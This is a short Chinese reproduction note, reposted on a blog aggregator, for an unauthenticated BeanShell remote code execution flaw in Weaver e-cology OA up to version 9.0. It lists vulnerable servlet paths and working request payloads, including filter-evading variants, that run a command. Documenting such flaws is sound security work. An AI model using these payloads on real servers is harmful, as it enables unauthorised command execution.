泛微e-cology OA 远程代码执行漏洞 - 润新知

泛微e-cology OA 远程代码执行漏洞
0x00 漏洞原理

该漏洞位于 e-cology OA系统BeanShell组件中，并且该组件允许未授权访问，攻击者可通过访问该组件执行任意的Java代码，导致远程命令执行。

0x01影响版本

泛微 e-cology<=9.0

0x02复现

可能的路径
```
/weaver/bsh.servlet.BshServlet
/weaveroa/bsh.servlet.BshServlet
/oa/bsh.servlet.BshServlet
```
payload：
```
bsh.script=exec("whoami");&bsh.servlet.output=raw
bsh.script=u0065u0078u0065u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"command\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami
```
0x03参考

https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204
相关阅读:
iOS 文本展开收起
 iOS 图片拉伸压缩展示对比
 iOS 视图在最前显示的两种实现方式对比
 iOS UITableView上滑吸顶的三种方案
 iOS UITableView在 UITableViewStyleGrouped样式下第一组组头变高问题
 友盟统计实时统计使用
 RN 侧滑删除功能实现
 RN 使用Radio实现单选
 RN 使用Checkbox实现多选
 iOS开发加密
原文地址：https://www.cnblogs.com/ffx1/p/12653561.html

Copyright © 2020-2023 润新知